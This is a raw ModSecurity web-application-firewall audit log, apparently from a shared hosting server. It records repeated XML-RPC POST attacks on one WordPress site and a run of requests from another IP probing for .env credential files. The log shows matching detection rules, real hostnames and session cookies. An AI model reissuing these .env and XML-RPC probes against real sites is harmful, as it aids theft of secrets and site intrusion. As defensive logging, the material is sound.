"aE6vExRnvL96XFagPFC4WgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/dealsdray.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987091350827 1117020 (- - -) Stopwatch2: 1749987091350827 1117020; combined=2070, p1=412, p2=1528, p3=0, p4=0, p5=130, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --677d1812-Z-- --429c5e64-A-- [15/Jun/2025:17:02:14.903582 +0530] aE6vPQ2U8ofTdsKp_yhKgQAAAAU 165.22.247.248 49990 127.0.0.1 7081 --429c5e64-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=0k2svjo8nulrfk27smorb0e1hq; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_10e24600a9a343096fd9f48a846890%7C%7C1750159933%7C%7C1750156333%7C%7Cd118e0ea4cf4e0b6e68fd9df754766b7; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ceb0c142a23246e25aebd248265203dd%7C%7C1750159933%7C%7C1750156333%7C%7C414b2f86867778d3a1299d59f3123603 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --429c5e64-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=jbb22suni3ig0s1stm34mfi1bj; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_2def0dec3cc3c6fdf89197860e6abb%7C%7C1750159934%7C%7C1750156334%7C%7Ccc5a7ce8170560e6bdb08c027d80150a; expires=Tue, 17 Jun 2025 11:32:14 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=c61dd73ee19af522c70fc710c96bd8f0%7C%7C1750159934%7C%7C1750156334%7C%7Cae0856205ba66dafcfeb0fc14b0271fc; expires=Tue, 17 Jun 2025 11:32:14 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --429c5e64-E-- --429c5e64-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6vPQ2U8ofTdsKp_yhKgQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987133839286 1064376 (- - -) Stopwatch2: 1749987133839286 1064376; combined=4055, p1=480, p2=3179, p3=95, p4=39, p5=160, sr=116, sw=102, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --429c5e64-Z-- --d2ee4920-A-- [15/Jun/2025:17:03:11.986779 +0530] aE6vdw9BijgXpeeI_r-_RgAAAAE 185.177.72.144 57954 127.0.0.1 7081 --d2ee4920-B-- GET /.env HTTP/1.0 Host: www.best-website-designs.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --d2ee4920-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://best-website-designs.com/.env Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --d2ee4920-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.best-website-designs.com"] [uri "/.env"] [unique_id "aE6vdw9BijgXpeeI_r-_RgAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987191032295 954551 (- - -) Stopwatch2: 1749987191032295 954551; combined=2397, p1=494, p2=1799, p3=0, p4=0, p5=103, sr=130, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d2ee4920-Z-- --540afe4f-A-- [15/Jun/2025:17:03:15.252227 +0530] aE6vejS8xKUOR1xBR5bpfwAAAAM 165.22.247.248 58068 127.0.0.1 7081 --540afe4f-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=uo20rnb3jf2isp32hqp9jfdvio; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_d7e85e71ef9b7905c9664163fae90a%7C%7C1750159993%7C%7C1750156393%7C%7C87d28d9d643350ab412345307908c810; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=360dae7cace1c5c42a31193661525d17%7C%7C1750159993%7C%7C1750156393%7C%7Cd2ba22f3427d3393bc484d6b11351443 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --540afe4f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=0kmfd8ith4c6arif5c86c4m90s; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_dd1b5117bac7343da9437c4000cb89%7C%7C1750159995%7C%7C1750156395%7C%7C080e8326d8baae1e9e5680aedba42ebe; expires=Tue, 17 Jun 2025 11:33:15 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=d4f32ce38380e565fcd57a86dca32923%7C%7C1750159995%7C%7C1750156395%7C%7C9eddefb354de425a6d831f79dd0ceba8; expires=Tue, 17 Jun 2025 11:33:15 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --540afe4f-E-- --540afe4f-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6vejS8xKUOR1xBR5bpfwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987194223482 1028839 (- - -) Stopwatch2: 1749987194223482 1028839; combined=2858, p1=384, p2=1999, p3=119, p4=45, p5=192, sr=101, sw=119, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --540afe4f-Z-- --cd95c36e-A-- [15/Jun/2025:17:03:42.355808 +0530] aE6vlRRnvL96XFagPFC4kgAAAAY 185.177.72.144 36480 127.0.0.1 7081 --cd95c36e-B-- GET /.env.bak HTTP/1.0 Host: www.best-website-designs.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --cd95c36e-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://best-website-designs.com/.env.bak Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --cd95c36e-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.best-website-designs.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.best-website-designs.com"] [uri "/.env.bak"] [unique_id "aE6vlRRnvL96XFagPFC4kgAAAAY"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.best-website-designs.com|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.best-website-designs.com"] [uri "/.env.bak"] [unique_id "aE6vlRRnvL96XFagPFC4kgAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987221261932 1093954 (- - -) Stopwatch2: 1749987221261932 1093954; combined=1815, p1=383, p2=1278, p3=0, p4=0, p5=154, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd95c36e-Z-- --c3b4a770-A-- [15/Jun/2025:17:04:12.458995 +0530] aE6vs1irsA1ruSKrNWSU1wAAAAQ 185.177.72.144 39222 127.0.0.1 7081 --c3b4a770-B-- GET /.env.example HTTP/1.0 Host: www.best-website-designs.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c3b4a770-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://best-website-designs.com/.env.example Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --c3b4a770-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.best-website-designs.com"] [uri "/.env.example"] [unique_id "aE6vs1irsA1ruSKrNWSU1wAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987251483141 975919 (- - -) Stopwatch2: 1749987251483141 975919; combined=1660, p1=392, p2=1169, p3=0, p4=0, p5=98, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c3b4a770-Z-- --aeab7e0c-A-- [15/Jun/2025:17:04:15.736525 +0530] aE6vtg2U8ofTdsKp_yhKuQAAAAU 165.22.247.248 39274 127.0.0.1 7081 --aeab7e0c-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=dnu76rajmlo3k56pkahbpqgdjc; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_7ac0f7e663a089536bfc4f118a1300%7C%7C1750160053%7C%7C1750156453%7C%7Cc047a3f54f55c2b35d34d4968f42336a; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=0964b846d2c93ba4fd3d8094215f5570%7C%7C1750160053%7C%7C1750156453%7C%7Cb3fd405cbe7215a48251fd1deb7e80fd User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --aeab7e0c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=rjnq258ef197blp75t1a6f8gaa; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_9ec04d7090d03b36c133c7a7bcbd9d%7C%7C1750160055%7C%7C1750156455%7C%7C371c97e7f76325146654ecf37c3baa13; expires=Tue, 17 Jun 2025 11:34:15 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ff55b4f91b0ecf8f4276df6596e269c4%7C%7C1750160055%7C%7C1750156455%7C%7C4810192f5a662f0798bb10595ddcad53; expires=Tue, 17 Jun 2025 11:34:15 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --aeab7e0c-E-- --aeab7e0c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (46+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6vtg2U8ofTdsKp_yhKuQAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987254675800 1060805 (- - -) Stopwatch2: 1749987254675800 1060805; combined=3172, p1=357, p2=2352, p3=103, p4=36, p5=193, sr=88, sw=131, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --aeab7e0c-Z-- --5433c879-A-- [15/Jun/2025:17:04:43.051223 +0530] aE6v0lWckDejtnB0cwJX8wAAAAA 185.177.72.144 36430 127.0.0.1 7081 --5433c879-B-- GET /.env.local HTTP/1.0 Host: www.best-website-designs.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5433c879-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://best-website-designs.com/.env.local Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --5433c879-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.best-website-designs.com"] [uri "/.env.local"] [unique_id "aE6v0lWckDejtnB0cwJX8wAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987282049142 1002169 (- - -) Stopwatch2: 1749987282049142 1002169; combined=2090, p1=539, p2=1438, p3=0, p4=0, p5=113, sr=141, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5433c879-Z-- --19822557-A-- [15/Jun/2025:17:05:13.257977 +0530] aE6v8FCip1xXG9qkRMdtcQAAAAc 185.177.72.144 33432 127.0.0.1 7081 --19822557-B-- GET /.env.old HTTP/1.0 Host: www.best-website-designs.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --19822557-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://best-website-designs.com/.env.old Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --19822557-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.best-website-designs.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.best-website-designs.com"] [uri "/.env.old"] [unique_id "aE6v8FCip1xXG9qkRMdtcQAAAAc"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.best-website-designs.com|F|2"] [data ".env.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.best-website-designs.com"] [uri "/.env.old"] [unique_id "aE6v8FCip1xXG9qkRMdtcQAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987312302261 955782 (- - -) Stopwatch2: 1749987312302261 955782; combined=2152, p1=416, p2=1607, p3=0, p4=0, p5=128, sr=103, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --19822557-Z-- --be15e71c-A-- [15/Jun/2025:17:05:15.403426 +0530] aE6v8lCip1xXG9qkRMdtcwAAAAc 165.22.247.248 33644 127.0.0.1 7081 --be15e71c-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=lfufiktjp4uputjn9rbuktodik; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_34258d529d6aa1e378c6cded9b0f5f%7C%7C1750160113%7C%7C1750156513%7C%7Ccc1101a4b4fac75d3601edca599daccf; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=32d1b5e32cdde822a2acb9292976bae7%7C%7C1750160114%7C%7C1750156514%7C%7C5de15f6032cc7a891dc99eaa2e0fa628 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --be15e71c-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=6lqdi9bpepmtdpo31rs81e9ij8; path=/ Set-Cookie: wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_4a5aea60d836fd10844692f2775a90%7C%7C1750160115%7C%7C1750156515%7C%7C77989b4ee48d8e6075ce9f87a1b61ae8; expires=Tue, 17 Jun 2025 11:35:15 GMT; Max-Age=172800; path=/; secure; HttpOnly Set-Cookie: yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=82c1393606fdcc62bd3b8383de9f06c8%7C%7C1750160115%7C%7C1750156515%7C%7C9a848d8af99f0f7f1d67cb572e6c5a1f; expires=Tue, 17 Jun 2025 11:35:15 GMT; Max-Age=172800; path=/ Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --be15e71c-E-- --be15e71c-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 165.22.247.248 (45+1 hits since last alert)|sarainternational.cstechns.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "sarainternational.cstechns.com"] [uri "/xmlrpc.php"] [unique_id "aE6v8lCip1xXG9qkRMdtcwAAAAc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sarainternational.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987314332676 1070876 (- - -) Stopwatch2: 1749987314332676 1070876; combined=2873, p1=388, p2=1991, p3=128, p4=48, p5=200, sr=96, sw=118, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --be15e71c-Z-- --9886411a-A-- [15/Jun/2025:17:05:43.582488 +0530] aE6wDlu1-lKBbvo2E9pBqAAAAAw 185.177.72.144 47166 127.0.0.1 7081 --9886411a-B-- GET /.env.production HTTP/1.0 Host: www.best-website-designs.com X-Real-IP: 185.177.72.144 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --9886411a-F-- HTTP/1.1 301 Moved Permanently X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-Redirect-By: WordPress Location: https://best-website-designs.com/.env.production Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --9886411a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.best-website-designs.com"] [uri "/.env.production"] [unique_id "aE6wDlu1-lKBbvo2E9pBqAAAAAw"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749987342601596 980958 (- - -) Stopwatch2: 1749987342601596 980958; combined=2080, p1=397, p2=1592, p3=0, p4=0, p5=90, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9886411a-Z-- --5de7a531-A-- [15/Jun/2025:17:06:15.851082 +0530] aE6wLlirsA1ruSKrNWSVKQAAAAQ 165.22.247.248 58362 127.0.0.1 7081 --5de7a531-B-- POST //xmlrpc.php HTTP/1.0 Host: sarainternational.cstechns.com X-Real-IP: 165.22.247.248 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 490 Cookie: PHPSESSID=rs42r7hi5aqereqd4k504qgafe; wp_woocommerce_session_0c7b6c468f739cb08bf10f9411cfebbb=t_1b5a7c1eade19f34a27b9857143d5b%7C%7C1750160174%7C%7C1750156574%7C%7C7de64f9f1c502d0f84d787cb103b8bad; yith_ywraq_session_0c7b6c468f739cb08bf10f9411cfebbb=ad82d7b3313a5c4982db232cfd47eb49%7C%7C1750160174%7C%7C1750156574%7C%7C86bb33f255e25d8ece72dae2326e3cc3 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 Content-Type: application/xml --5de7a531-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Set-Cookie: PHPSESSID=7us4rdnvs3a91a9ttc375ls6i9; path=/ 